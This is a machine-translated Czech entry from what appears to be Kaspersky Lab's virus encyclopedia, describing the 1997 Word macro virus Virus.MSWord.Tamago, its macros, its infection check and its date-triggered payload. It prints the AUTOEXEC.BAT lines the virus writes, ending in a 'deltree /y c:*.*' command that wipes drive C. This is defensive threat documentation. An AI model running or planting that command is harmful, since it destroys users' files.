Tato služba může obsahovat Google překlady. Společnost Google odmítá veškerou odpovědnost za překlad, doslovný i předpokládaný, včetně veškerých záruk aktuálnosti, spolehlivosti a veškerých záruk předpokládané zobchodovatelnosti, vhodnosti pro daný účel a neporušení práv.

Web Kaspersky Lab byl přeložen překládacím softwarem založeným na Google Translate. Bylo vynaloženo přiměřené úsilí, aby byl zajištěn přesný překlad, avšak žádný automatický překlad není dokonalý a není určen k nahrazení lidských překladatelů. Překlady jsou poskytovány jako služba uživatelům webových stránek a jsou poskytovány „tak jak jsou“. Neexistuje žádná záruka jakéhokoliv druhu, na vyjádřený nebo předpokládaný překlad, na přesnost nebo správnost překladů. Některý obsah (například obrázky, videa, Flash atd.) Nemusí být přesně přeložen z důvodu omezení překladového softwaru.

Virus.MSWord.Tamago

Třída Virus
Platfoma MSWord
Popis

Technické údaje

Tento virus makro ovlivňuje systém při zavírání infikovaných dokumentů a kopíruje se na dokumenty, které jsou uzavřeny nebo uloženy s novým názvem. Obsahuje sedm maker:

Dokumenty NORMAL.DOTAutoOp AutoOpenAutoExec AutoExecAutoClose AutoCloseUtilMacro UtilMacroFerramMacro FerramMacroArquivoModelos ArquivoModelosArquivoSalvarComo ArquivoSalvarComo
Virus neinfikuje systém a dokumenty, pokud prostředí obsahuje řetězec "TAMAGOXI = GMS" (autorská ochrana autora?). V tomto případě virus zobrazí MessageBox:
(sLEEp MODE) TaMaGoXi bY WiZaRD: EtERnAl LoVE 2 mY LitTlE gIrL Gi
V 26 v kterémkoliv měsíci virus píše instrukce C: AUTOEXEC.BAT, které zobrazí zprávu a odstraní všechny soubory na jednotce C:
@echo offclsecho.echo.echo.echo CoRP SaLamA – AlL lEfTS ReSerVeD – 1997echo TaMaGoXI bY WiZaRD ***echo ***echo *echo *echo *************echo * *echo * **** **** *echo * *echo * ***** *echo ***************echo.echo eXPecT nO MeRcY FRoM HiMecho.echo.echo Soubor 'nenašel: Serve Alcatara Mane'? (S / N)echo.echo.deltree /yc:*.*> nul


Odkaz na originál
Zjistěte statistiky hrozeb šířících se ve vašem regionu